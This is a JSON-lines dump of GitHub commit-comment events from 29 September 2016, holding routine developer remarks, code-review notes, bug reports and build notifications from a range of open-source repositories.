{"id":"4640186418","type":"CommitCommentEvent","actor":{"login":"cschneider"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19232437,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-29T21:49:13Z","updated_at":"2016-09-29T21:49:13Z","body":"Interesting .. now I see the urls already contained RELEASE .. I was sure they still contained LATEST. Btw. I wonder if I should change the openjpa url to ../xml/features. It seems features works in a special way when building a karaf custom distro. "}},"created_at":"2016-09-29T21:49:13Z"}
{"id":"4640197009","type":"CommitCommentEvent","actor":{"login":"gkhandelwal"},"repo":{"name":"gkhandelwal/HoneyBeeLoadBalancer"},"payload":{"comment":{"id":19232474,"position":null,"line":null,"path":null,"commit_id":"65d04f0b8eaaa71ef353cc3c1c92f446b2069356","created_at":"2016-09-29T21:51:26Z","updated_at":"2016-09-29T21:51:26Z","body":"This folder contains test cases. Normal and burst represents how aggressively we are getting workloads to VM's."}},"created_at":"2016-09-29T21:51:26Z"}
{"id":"4640204497","type":"CommitCommentEvent","actor":{"login":"anaramirli"},"repo":{"name":"danishm/dicom-to-png"},"payload":{"comment":{"id":19232503,"position":null,"line":null,"path":null,"commit_id":"f6e2e016c7922db0923d8b74c9771cff2a7aa0e8","created_at":"2016-09-29T21:53:00Z","updated_at":"2016-09-29T21:53:00Z","body":"MRI(DICOM) to PNG\r\n\r\nHello Danish Mujeeb. Good day. We are student and working on project. We need to convert convert dicom files into jpg.  but problem is that i'm fresh on python and faced with error in your code that is why i can not handle it.  \r\nthis part below is not clear to me and gives error. \r\nparser.add_argument('dicom_path', help='Full path to the mri file') \r\nparser.add_argument('png_path', help='Full path to the generated png file')\r\n And the error i faced is: \r\nusage: mritopng.py [-h] [-f] dicom_path png_path\r\n mritopng.py: error: the following arguments are required: dicom_path, png_path \r\n\r\n\r\n I will be appreciate if you help me.  Thanks in advance."}},"created_at":"2016-09-29T21:53:00Z"}
{"id":"4640211940","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19232517,"position":null,"line":null,"path":null,"commit_id":"c3843cae80ff4b2a6dc1bd6686c4b121b352ad62","created_at":"2016-09-29T21:54:32Z","updated_at":"2016-09-29T21:54:32Z","body":"My bad. Sorry!"}},"created_at":"2016-09-29T21:54:32Z"}
{"id":"4640222950","type":"CommitCommentEvent","actor":{"login":"Jonathan50"},"repo":{"name":"Jonathan50/do-it"},"payload":{"comment":{"id":19232541,"position":null,"line":null,"path":null,"commit_id":"07738e41aef9905f2e9fd3e1c96752ec571428d9","created_at":"2016-09-29T21:56:52Z","updated_at":"2016-09-29T21:56:52Z","body":"Emacs doesn't like it"}},"created_at":"2016-09-29T21:56:52Z"}
{"id":"4640223067","type":"CommitCommentEvent","actor":{"login":"paulmueller"},"repo":{"name":"ZELLMECHANIK-DRESDEN/ShapeOut"},"payload":{"comment":{"id":19232544,"position":53,"line":53,"path":"shapeout/lin_mix_mod.py","commit_id":"8bb0743c0005096b49324aa95bf8d8d34a7bea6c","created_at":"2016-09-29T21:56:54Z","updated_at":"2016-09-29T21:56:54Z","body":"@MaikH88 I have replaced this line. Since we are computing integers anyway, there is no need to do\r\n`np.floor(prng_object.rand(len(yR))*len(yR)).astype(int)`."}},"created_at":"2016-09-29T21:56:54Z"}
{"id":"4640225088","type":"CommitCommentEvent","actor":{"login":"easye"},"repo":{"name":"easye/abcl"},"payload":{"comment":{"id":19232551,"position":null,"line":null,"path":null,"commit_id":"74d0a61cd32e8971938183822c108eea098c2657","created_at":"2016-09-29T21:57:20Z","updated_at":"2016-09-29T21:57:20Z","body":"From <https://github.com/ferada/abcl>.\r\n"}},"created_at":"2016-09-29T21:57:20Z"}
{"id":"4640230118","type":"CommitCommentEvent","actor":{"login":"easye"},"repo":{"name":"easye/abcl"},"payload":{"comment":{"id":19232566,"position":null,"line":null,"path":null,"commit_id":"bf8c4b69d9a61fae41c7b1d0b0602714b3ec6daf","created_at":"2016-09-29T21:58:22Z","updated_at":"2016-09-29T21:58:22Z","body":"From https://github.com/ferada/abcl.  \r\n\r\nCurrently blocking 1.4.0 release due to latest SEGV'ing ORCL JRE 8."}},"created_at":"2016-09-29T21:58:22Z"}
{"id":"4640233670","type":"CommitCommentEvent","actor":{"login":"texai"},"repo":{"name":"GDGLima/glab_docker"},"payload":{"comment":{"id":19232579,"position":null,"line":null,"path":null,"commit_id":"7ce2c4c7555e37ea48d55e80def762cdc0612d96","created_at":"2016-09-29T21:59:09Z","updated_at":"2016-09-29T21:59:09Z","body":"@mario21ic oe trabaja oe :P "}},"created_at":"2016-09-29T21:59:09Z"}
{"id":"4640235945","type":"CommitCommentEvent","actor":{"login":"jessepeterson"},"repo":{"name":"micromdm/scep"},"payload":{"comment":{"id":19232587,"position":29,"line":65,"path":"server/transport.go","commit_id":"60d4c42a32a57213e13aa5129c881051b6c801fd","created_at":"2016-09-29T21:59:39Z","updated_at":"2016-09-29T21:59:39Z","body":"That is terribly nasty. What, are they doing RE pattern matching to decode the values? Why on earth would NDES require this?!"}},"created_at":"2016-09-29T21:59:39Z"}
{"id":"4640236929","type":"CommitCommentEvent","actor":{"login":"eliasdorneles"},"repo":{"name":"scrapy/scrapy"},"payload":{"comment":{"id":19232595,"position":39,"line":69,"path":"docs/topics/architecture.rst","commit_id":"3ac3ac4d925ee7ef1eb8be8dc6519606c0fbf9b0","created_at":"2016-09-29T21:59:51Z","updated_at":"2016-09-29T21:59:51Z","body":"Ookay, haha, lemme bring back `step 1`."}},"created_at":"2016-09-29T21:59:51Z"}
{"id":"4640243365","type":"CommitCommentEvent","actor":{"login":"justiniv"},"repo":{"name":"justiniv/Test"},"payload":{"comment":{"id":19232659,"position":5,"line":5,"path":"Test1","commit_id":"f64752a0e9ae331763c718a70924e3fe049fe46e","created_at":"2016-09-29T22:01:06Z","updated_at":"2016-09-29T22:01:06Z","body":"test comment"}},"created_at":"2016-09-29T22:01:06Z"}
{"id":"4640245583","type":"CommitCommentEvent","actor":{"login":"mandy1010"},"repo":{"name":"mandy1010/GIS-Geography"},"payload":{"comment":{"id":19232665,"position":null,"line":null,"path":null,"commit_id":"712d6bc039b736acfae4980cb167208417df2f94","created_at":"2016-09-29T22:01:31Z","updated_at":"2016-09-29T22:01:31Z","body":"Euclidean distance tool in ArcMap"}},"created_at":"2016-09-29T22:01:31Z"}
{"id":"4640248114","type":"CommitCommentEvent","actor":{"login":"mandy1010"},"repo":{"name":"mandy1010/GIS-Geography"},"payload":{"comment":{"id":19232672,"position":null,"line":null,"path":null,"commit_id":"7257ae14d8fe04c4e1b79c57e52f8f0a8a6fbf33","created_at":"2016-09-29T22:02:01Z","updated_at":"2016-09-29T22:02:01Z","body":"Euclidean allocation tool in ArcMap"}},"created_at":"2016-09-29T22:02:01Z"}
{"id":"4640252483","type":"CommitCommentEvent","actor":{"login":"idirouhab"},"repo":{"name":"aperezg/docker-nginx-mysql-php"},"payload":{"comment":{"id":19232696,"position":50,"line":50,"path":"docker/mysql/config/docker-entrypoint.sh","commit_id":"6e2874bf6b5ec89accf5a5e63870c0744815adad","created_at":"2016-09-29T22:02:54Z","updated_at":"2016-09-29T22:02:54Z","body":"No such file or directory"}},"created_at":"2016-09-29T22:02:54Z"}
{"id":"4640263563","type":"CommitCommentEvent","actor":{"login":"eliasdorneles"},"repo":{"name":"scrapy/scrapy"},"payload":{"comment":{"id":19232719,"position":39,"line":69,"path":"docs/topics/architecture.rst","commit_id":"3ac3ac4d925ee7ef1eb8be8dc6519606c0fbf9b0","created_at":"2016-09-29T22:05:16Z","updated_at":"2016-09-29T22:05:16Z","body":"PR: https://github.com/scrapy/scrapy/pull/2296"}},"created_at":"2016-09-29T22:05:16Z"}
{"id":"4640266446","type":"CommitCommentEvent","actor":{"login":"Evendur"},"repo":{"name":"Evendur/hallo-github"},"payload":{"comment":{"id":19232730,"position":null,"line":null,"path":null,"commit_id":"0d62cd98cf1eb5a7103bb05234290ff6468a83fb","created_at":"2016-09-29T22:05:56Z","updated_at":"2016-09-29T22:05:56Z","body":"Zeile hinzugefügt mit Markdown Elementen\r\n\r\nund nochmal Grüße ;)"}},"created_at":"2016-09-29T22:05:56Z"}
{"id":"4640270154","type":"CommitCommentEvent","actor":{"login":"Evendur"},"repo":{"name":"Evendur/hallo-github"},"payload":{"comment":{"id":19232744,"position":null,"line":null,"path":null,"commit_id":"bd51fd014cf1520642281bbe736b74dffe3303ac","created_at":"2016-09-29T22:06:47Z","updated_at":"2016-09-29T22:06:47Z","body":"Programmzeile hier ebenfalls ergänzt"}},"created_at":"2016-09-29T22:06:47Z"}
{"id":"4640276400","type":"CommitCommentEvent","actor":{"login":"ahelord"},"repo":{"name":"ahelord/centros"},"payload":{"comment":{"id":19232760,"position":null,"line":null,"path":null,"commit_id":"5785d70df0535fb6be1aa965f34ad08fb7ce774d","created_at":"2016-09-29T22:08:12Z","updated_at":"2016-09-29T22:08:12Z","body":"com"}},"created_at":"2016-09-29T22:08:12Z"}
{"id":"4640277068","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19232764,"position":null,"line":null,"path":null,"commit_id":"894def07d56bc451be8dde5cae313e76290c7bc0","created_at":"2016-09-29T22:08:20Z","updated_at":"2016-09-29T22:08:20Z","body":"ok... I don't know where I got that idea, I can't find anything concrete on it.  Oh well, it's pretty easy to undo\r\n\r\ni did forget about \"clean\" hits entirely though, so at least this mistake did amount to something"}},"created_at":"2016-09-29T22:08:20Z"}
{"id":"4640281295","type":"CommitCommentEvent","actor":{"login":"GuilhermeEsteves"},"repo":{"name":"GuilhermeEsteves/doacaobrasil"},"payload":{"comment":{"id":19232782,"position":null,"line":null,"path":null,"commit_id":"9421a17579997998125794ee37995cfba2c98b9e","created_at":"2016-09-29T22:09:17Z","updated_at":"2016-09-29T22:09:17Z","body":"primeiro commit"}},"created_at":"2016-09-29T22:09:17Z"}
{"id":"4640283263","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19232787,"position":null,"line":null,"path":null,"commit_id":"0de76d49b570d803776cf67e8ed469c0fb4760fb","created_at":"2016-09-29T22:09:46Z","updated_at":"2016-09-29T22:09:46Z","body":"Wait, I ran `brew pull --bottle --bump 5392`... Why do I have another commit..."}},"created_at":"2016-09-29T22:09:46Z"}
{"id":"4640291689","type":"CommitCommentEvent","actor":{"login":"ssigwart"},"repo":{"name":"ssigwart/ionic"},"payload":{"comment":{"id":19232810,"position":null,"line":null,"path":null,"commit_id":"6ac1fc32725beafb65af6e784fadec8f0a2e7767","created_at":"2016-09-29T22:11:36Z","updated_at":"2016-09-29T22:11:36Z","body":"This commit isn't needed.  Adding `overflow-scroll=\"false\"` to `<ion-content>` fixed the issue."}},"created_at":"2016-09-29T22:11:36Z"}
{"id":"4640294610","type":"CommitCommentEvent","actor":{"login":"dafegopi11"},"repo":{"name":"dafegopi11/csc174-test"},"payload":{"comment":{"id":19232814,"position":null,"line":null,"path":null,"commit_id":"2f9c3774b85f235df992bbda38adc868c864f02b","created_at":"2016-09-29T22:12:14Z","updated_at":"2016-09-29T22:12:14Z","body":"Hola, como estas? I don't know, just commenting"}},"created_at":"2016-09-29T22:12:14Z"}
{"id":"4640300419","type":"CommitCommentEvent","actor":{"login":"Nooknok"},"repo":{"name":"robertohuertasm/vscode-icons"},"payload":{"comment":{"id":19232832,"position":null,"line":null,"path":null,"commit_id":"18c145ed76852c7ddc5ef27d665d629d2edfc143","created_at":"2016-09-29T22:13:30Z","updated_at":"2016-09-29T22:13:30Z","body":".."}},"created_at":"2016-09-29T22:13:30Z"}
{"id":"4640313486","type":"CommitCommentEvent","actor":{"login":"kari1982"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19232850,"position":12,"line":18,"path":"pm2Start.js","commit_id":"4ad9fbd8da31ad920b4d062a29ac3a6f59d08687","created_at":"2016-09-29T22:16:22Z","updated_at":"2016-09-29T22:16:22Z","body":"L"}},"created_at":"2016-09-29T22:16:22Z"}
{"id":"4640318438","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"Qfusion/qfusion"},"payload":{"comment":{"id":19232865,"position":null,"line":null,"path":null,"commit_id":"4633daf148aff89caa1bd14e04a4dcc7ab34e96c","created_at":"2016-09-29T22:17:33Z","updated_at":"2016-09-29T22:17:33Z","body":"There are lot more code parts in /game module that would benefit of marking as const since game code is compiled as C++."}},"created_at":"2016-09-29T22:17:33Z"}
{"id":"4640318439","type":"CommitCommentEvent","actor":{"login":"Sharfikk"},"repo":{"name":"Sharfikk/site"},"payload":{"comment":{"id":19232866,"position":null,"line":null,"path":null,"commit_id":"85091db6138e265f9e493d04a9086b85e37aa410","created_at":"2016-09-29T22:17:33Z","updated_at":"2016-09-29T22:17:33Z","body":"Ьыфыф"}},"created_at":"2016-09-29T22:17:33Z"}
{"id":"4640321494","type":"CommitCommentEvent","actor":{"login":"kari1982"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19232873,"position":10,"line":17,"path":"common/app/routes/challenges/components/classic/Side-Panel.jsx","commit_id":"57b6debb4490eef632cc1d8386c83048d748eaf1","created_at":"2016-09-29T22:18:14Z","updated_at":"2016-09-29T22:18:14Z","body":"FGhh"}},"created_at":"2016-09-29T22:18:14Z"}
{"id":"4640339088","type":"CommitCommentEvent","actor":{"login":"cpinter"},"repo":{"name":"QIICR/dcmqi"},"payload":{"comment":{"id":19232914,"position":null,"line":null,"path":null,"commit_id":"18f296ef82e87509beea3bd9877ac0fbb7ce9465","created_at":"2016-09-29T22:22:20Z","updated_at":"2016-09-29T22:22:20Z","body":"AnatomicRegionModifier-Master.json and AnatomicRegionAndModifier-DICOM-Master.json seem to be identical. If they won't deviate from each other then, I think keeping one is enough."}},"created_at":"2016-09-29T22:22:20Z"}
{"id":"4640343099","type":"CommitCommentEvent","actor":{"login":"h0td0g"},"repo":{"name":"h0td0g/metaverse"},"payload":{"comment":{"id":19232929,"position":12,"line":12,"path":"components/ajaxHref.js","commit_id":"6625fd8a4634027793285f5b5aa6db4531e7795e","created_at":"2016-09-29T22:23:14Z","updated_at":"2016-09-29T22:23:14Z","body":"dr eval is back!"}},"created_at":"2016-09-29T22:23:14Z"}
{"id":"4640343839","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19232932,"position":null,"line":null,"path":null,"commit_id":"806e00434c34aa6c3911c2148292902f2782ffdb","created_at":"2016-09-29T22:23:24Z","updated_at":"2016-09-29T22:23:24Z","body":"I put back ctx as a keyword param of TestDisint. The context can now be\npassed to TestDisint 1) (old way) as a keyword param in the call to\nTestDisint, 2) (new way) as a keyword param member of the 1st arg of\nTestDisint if that 1st arg is a list (which must then contain the\ndifferentiation variable(s) as its 2nd member), or 3) both the new way and\nthe old way, in which case the old way takes precedence.\n\nThe way that you worded your reply immediately above made me think that you\nhad possibly thought that I had \"introduced a new calling convention for\ndisint.\" No, I had only introduced a new calling convention for TestDisint.\n\nOn Thu, Sep 29, 2016 at 11:18 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> The rest of the code takes a measure and a context as separate arguments\n> -- it's a bad idea to introduce a new calling convention for disint. You\n> can genuinely agree that our calling convention is sub-optimal -- but it\n> should be fixed throughout and not piecemeal. Please restore that part, for\n> now.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/806e00434c34aa6c3911c2148292902f2782ffdb#commitcomment-19225713>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9dN1VeAnz6HOtvAq6EMHdMpSuOLHks5qu9bggaJpZM4KJ4Sj>\n> .\n>\n"}},"created_at":"2016-09-29T22:23:24Z"}
{"id":"4640343866","type":"CommitCommentEvent","actor":{"login":"dunn"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19232933,"position":null,"line":null,"path":null,"commit_id":"0de76d49b570d803776cf67e8ed469c0fb4760fb","created_at":"2016-09-29T22:23:25Z","updated_at":"2016-09-29T22:23:25Z","body":"`--bump` doesn't squash the commits; you still have to do that manually if you want to."}},"created_at":"2016-09-29T22:23:25Z"}
{"id":"4640345832","type":"CommitCommentEvent","actor":{"login":"cdahlhausen"},"repo":{"name":"APTrust/bagman"},"payload":{"comment":{"id":19232944,"position":null,"line":null,"path":null,"commit_id":"c8835ac69d612a74ee2480943ec0e4e8462205a7","created_at":"2016-09-29T22:23:52Z","updated_at":"2016-09-29T22:23:52Z","body":"I am not certain what inplace does if a transfer is interrupted. I think it just restarts the complete sync of that file, since it won't append/resume. No append and/or -W (whole-file) means no delta transfers. I think that it will keep the incomplete file around. I can run a test tomorrow."}},"created_at":"2016-09-29T22:23:52Z"}
{"id":"4640347025","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19232948,"position":null,"line":null,"path":null,"commit_id":"0de76d49b570d803776cf67e8ed469c0fb4760fb","created_at":"2016-09-29T22:24:09Z","updated_at":"2016-09-29T22:24:09Z","body":"Faulty memory 😓 "}},"created_at":"2016-09-29T22:24:09Z"}
{"id":"4640347553","type":"CommitCommentEvent","actor":{"login":"AlexNisnevich"},"repo":{"name":"h0td0g/metaverse"},"payload":{"comment":{"id":19232950,"position":12,"line":12,"path":"components/ajaxHref.js","commit_id":"6625fd8a4634027793285f5b5aa6db4531e7795e","created_at":"2016-09-29T22:24:14Z","updated_at":"2016-09-29T22:24:14Z","body":"Some say he never left ..."}},"created_at":"2016-09-29T22:24:14Z"}
{"id":"4640347828","type":"CommitCommentEvent","actor":{"login":"fedorov"},"repo":{"name":"QIICR/dcmqi"},"payload":{"comment":{"id":19232951,"position":null,"line":null,"path":null,"commit_id":"18f296ef82e87509beea3bd9877ac0fbb7ce9465","created_at":"2016-09-29T22:24:18Z","updated_at":"2016-09-29T22:24:18Z","body":"I agree. And commits of these files do not belong in this commit anyway. This may have happened by mistake."}},"created_at":"2016-09-29T22:24:18Z"}
{"id":"4640349124","type":"CommitCommentEvent","actor":{"login":"dunn"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19232959,"position":null,"line":null,"path":null,"commit_id":"0de76d49b570d803776cf67e8ed469c0fb4760fb","created_at":"2016-09-29T22:24:35Z","updated_at":"2016-09-29T22:24:35Z","body":"haha it's not a big deal"}},"created_at":"2016-09-29T22:24:35Z"}
{"id":"4640357027","type":"CommitCommentEvent","actor":{"login":"tbarsballe"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":19232978,"position":18,"line":67,"path":"src/web/core/src/main/java/org/geoserver/web/data/store/WMSStoreNewPage.java","commit_id":"bb8be8fee2565d8ea1886686ebcab7f7df292c48","created_at":"2016-09-29T22:26:23Z","updated_at":"2016-09-29T22:26:23Z","body":"This should be savedStore, not expandedStore."}},"created_at":"2016-09-29T22:26:23Z"}
{"id":"4640358347","type":"CommitCommentEvent","actor":{"login":"jessicachoy"},"repo":{"name":"jessicachoy/testing"},"payload":{"comment":{"id":19232986,"position":6,"line":4,"path":"intro","commit_id":"a1aaf7b3fc2453755acfd592ff6d254438c5aaa2","created_at":"2016-09-29T22:26:42Z","updated_at":"2016-09-29T22:26:42Z","body":"comment"}},"created_at":"2016-09-29T22:26:42Z"}
{"id":"4640359911","type":"CommitCommentEvent","actor":{"login":"jessicachoy"},"repo":{"name":"jessicachoy/testing"},"payload":{"comment":{"id":19232994,"position":null,"line":null,"path":null,"commit_id":"a1aaf7b3fc2453755acfd592ff6d254438c5aaa2","created_at":"2016-09-29T22:27:05Z","updated_at":"2016-09-29T22:27:05Z","body":"comment"}},"created_at":"2016-09-29T22:27:05Z"}
{"id":"4640366925","type":"CommitCommentEvent","actor":{"login":"yrsegal"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19233010,"position":null,"line":null,"path":null,"commit_id":"2dedc972ca1b0e714e05c5bd379e0d70177dc2d2","created_at":"2016-09-29T22:28:44Z","updated_at":"2016-09-29T22:28:44Z","body":":o"}},"created_at":"2016-09-29T22:28:44Z"}
{"id":"4640367327","type":"CommitCommentEvent","actor":{"login":"donkirkby"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19233012,"position":38,"line":57,"path":"src/charData.js","commit_id":"9a9d6216c92c72ee2554a5d88eaa3552f8461fb8","created_at":"2016-09-29T22:28:51Z","updated_at":"2016-09-29T22:28:51Z","body":"Switched to punycode in commit 52f04fef68db5c4d750861c64ccca56b0bd97e48. Thanks for the suggestion."}},"created_at":"2016-09-29T22:28:51Z"}
{"id":"4640370032","type":"CommitCommentEvent","actor":{"login":"chauduong"},"repo":{"name":"modelergy/gitbucket"},"payload":{"comment":{"id":19233019,"position":null,"line":null,"path":null,"commit_id":"2381d7e9076fcbb6e18b536d44db0ff16e339671","created_at":"2016-09-29T22:29:31Z","updated_at":"2016-09-29T22:29:31Z","body":"Case 1.\r\nI just uploaded 2 png files to https://cs-dev.modeler.gy/TestTenant/Help.  The operation was successful, but when I click on the file, it shows a broken icon link \r\n![image](https://cloud.githubusercontent.com/assets/13487752/18974617/f896b878-8658-11e6-82a0-2fcb27e5fc3a.png)\r\nSo, I clone the repo, and try to open the png file from my local computer, it cannot open it.\r\n\r\nCase 2.\r\nI tried to upload a file that's not supported, it says the file type is not supported, but it still shows \"Uploading your files ...\"\r\n![image](https://cloud.githubusercontent.com/assets/13487752/18974680/72ba15f0-8659-11e6-8d08-6955c7ee1e8e.png)\r\n\r\n3. \r\nIssues not related to file upload\r\nIf you copy the git url to clone, the protocol is 'http' instead of 'https'\r\n"}},"created_at":"2016-09-29T22:29:31Z"}
{"id":"4640371396","type":"CommitCommentEvent","actor":{"login":"trajano"},"repo":{"name":"SatellaLB/to-do-list"},"payload":{"comment":{"id":19233025,"position":1,"line":1,"path":"client/main.js","commit_id":"e5a2bf83bc374496a635df2c3917a9c735fe200b","created_at":"2016-09-29T22:29:53Z","updated_at":"2016-09-29T22:29:53Z","body":"In JavaScript you don't need to put semicolons to finish a line."}},"created_at":"2016-09-29T22:29:53Z"}
{"id":"4640380298","type":"CommitCommentEvent","actor":{"login":"cjh41"},"repo":{"name":"icc1/SE1project"},"payload":{"comment":{"id":19233047,"position":null,"line":null,"path":null,"commit_id":"9bcfe28c123f90420e6678e7303bbb16371495b3","created_at":"2016-09-29T22:31:57Z","updated_at":"2016-09-29T22:31:57Z","body":"This is my most up to date version, which includes attributes in most of the classes"}},"created_at":"2016-09-29T22:31:57Z"}
{"id":"4640381402","type":"CommitCommentEvent","actor":{"login":"rosatolen"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19233050,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-29T22:32:13Z","updated_at":"2016-09-29T22:32:13Z","body":"If we are using a mixed key and not encrypting the header, then the new Diffie-Hellman Ratchet key will not be encrypted by the SuperEncryption in the data exchange. I think that would be a case for us to encrypt the header. "}},"created_at":"2016-09-29T22:32:13Z"}
{"id":"4640382112","type":"CommitCommentEvent","actor":{"login":"endodoug"},"repo":{"name":"endodoug/MyPhotoFeedView"},"payload":{"comment":{"id":19233053,"position":null,"line":null,"path":null,"commit_id":"9a77af57cc0137ed77bbb2c10ea396bc0241e7b9","created_at":"2016-09-29T22:32:22Z","updated_at":"2016-09-29T22:32:22Z","body":"So now I'm set up ready to roll.\r\n\r\nInitial setup is done\r\nadded and formatted some images to work with\r\nadded image data into it's own plist\r\nadded a photo class, which contains each photo's data -> a name for now.\r\nadded a photoCell class where the image view is connected -> displays the photo\r\nadded a photo+services extension file, where the photo retrieval functionality happens\r\n"}},"created_at":"2016-09-29T22:32:22Z"}
{"id":"4640384411","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19233057,"position":37,"line":70,"path":"src/pocketmine/level/format/generic/BaseLevelProvider.php","commit_id":"3cd745f18d5eb41c1e637d925e16f090d97c913f","created_at":"2016-09-29T22:32:53Z","updated_at":"2016-09-29T22:32:53Z","body":"Uhm"}},"created_at":"2016-09-29T22:32:53Z"}
{"id":"4640390656","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19233073,"position":5,"line":2570,"path":"src/pocketmine/Server.php","commit_id":"3cd745f18d5eb41c1e637d925e16f090d97c913f","created_at":"2016-09-29T22:34:17Z","updated_at":"2016-09-29T22:34:17Z","body":"!!! Stop timings"}},"created_at":"2016-09-29T22:34:17Z"}
{"id":"4640394009","type":"CommitCommentEvent","actor":{"login":"davies"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19233083,"position":5,"line":604,"path":"sql/core/src/main/scala/org/apache/spark/sql/execution/columnar/ColumnType.scala","commit_id":"85b0a157543201895557d66306b38b3ca52f2151","created_at":"2016-09-29T22:35:03Z","updated_at":"2016-09-29T22:35:03Z","body":"This is not correct, we use Int as the length, it should be 4. otherwise we should use Long as length."}},"created_at":"2016-09-29T22:35:03Z"}
{"id":"4640396331","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19233091,"position":null,"line":null,"path":null,"commit_id":"9bc2ff064462b1e8018c792a41814501e03bc6ff","created_at":"2016-09-29T22:35:39Z","updated_at":"2016-09-29T22:35:39Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.274.9bc2ff064462b1e8018c792a41814501e03bc6ff](http://build.palaso.org/viewLog.html?buildId=77239&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Execution timeout Build time: 00:35:18"}},"created_at":"2016-09-29T22:35:39Z"}
{"id":"4640400392","type":"CommitCommentEvent","actor":{"login":"awangfrance"},"repo":{"name":"awangfrance/test"},"payload":{"comment":{"id":19233101,"position":null,"line":null,"path":null,"commit_id":"b6cfed9da7f6fd76da336111ac42d64f464dd35f","created_at":"2016-09-29T22:36:37Z","updated_at":"2016-09-29T22:36:37Z","body":"test"}},"created_at":"2016-09-29T22:36:37Z"}
{"id":"4640401241","type":"CommitCommentEvent","actor":{"login":"chauduong"},"repo":{"name":"modelergy/gitbucket"},"payload":{"comment":{"id":19233104,"position":null,"line":null,"path":null,"commit_id":"2381d7e9076fcbb6e18b536d44db0ff16e339671","created_at":"2016-09-29T22:36:48Z","updated_at":"2016-09-29T22:36:48Z","body":"I just upload a pdf file (Benefit 2016).  The operation was successful.  The file has a valid size, it has 5 pages, but I cannot open the file from gitbucket.  When pulling the file to my local machine.  The content of the file is just 5 blank pages. "}},"created_at":"2016-09-29T22:36:48Z"}
{"id":"4640403061","type":"CommitCommentEvent","actor":{"login":"Feng-Shui"},"repo":{"name":"govCMS/govCMS"},"payload":{"comment":{"id":19233109,"position":null,"line":null,"path":null,"commit_id":"30a4b200a3803a6ee6e43fa50f42ca516f263efe","created_at":"2016-09-29T22:37:15Z","updated_at":"2016-09-29T22:37:15Z","body":"@fiasco It seems that this PR has the effect of copying everything in the project root into the govCMS profile directory within the docroot.  This has caused us issues, as we've got additional folders in our repo root that are now copied into the profile directory when re-building the project within our repo (for example, we've got a vagrant folder, and a DHS folder which holds code, gulp stuff etc) and these end up in `/docroot/profiles/govcms`.\r\n\r\nWe build from govCMS by merging a govCMS release commit into a feature branch merged from our dev branch, and then running the build command, doing any tidy up and then merging back into our dev branch.  With this change, we're going to need to checkout the release commit, branch it, build, and then merge with our dev.\r\n\r\nIs there any general advice about how running updates like this should work?"}},"created_at":"2016-09-29T22:37:15Z"}
{"id":"4640403072","type":"CommitCommentEvent","actor":{"login":"gvanrossum"},"repo":{"name":"python/typing"},"payload":{"comment":{"id":19233110,"position":6,"line":611,"path":"python2/typing.py","commit_id":"c5b66dea9ca1ac98f5d7b73c7230252f7cc5d354","created_at":"2016-09-29T22:37:15Z","updated_at":"2016-09-29T22:37:15Z","body":"But this is not true (not in typing.py, not in mypy)."}},"created_at":"2016-09-29T22:37:15Z"}
{"id":"4640407110","type":"CommitCommentEvent","actor":{"login":"bittelc"},"repo":{"name":"jreut/elm-set-game"},"payload":{"comment":{"id":19233116,"position":null,"line":null,"path":null,"commit_id":"6d6f62ae91ab288ba8f243566f865b4e9ba2acf7","created_at":"2016-09-29T22:38:15Z","updated_at":"2016-09-29T22:38:15Z","body":"It all makes sense now."}},"created_at":"2016-09-29T22:38:15Z"}
{"id":"4640409981","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19233122,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-29T22:38:58Z","updated_at":"2016-09-29T22:38:58Z","body":"Yes but no, you can also put this part into message and use MK to encrypt, it's not a sufficient reason for keeping header key.\r\nHeader key can be used to hide information about the ratchet/message id(because we can't do this with a chainkey), but I'm not sure if it's necessary here."}},"created_at":"2016-09-29T22:38:58Z"}
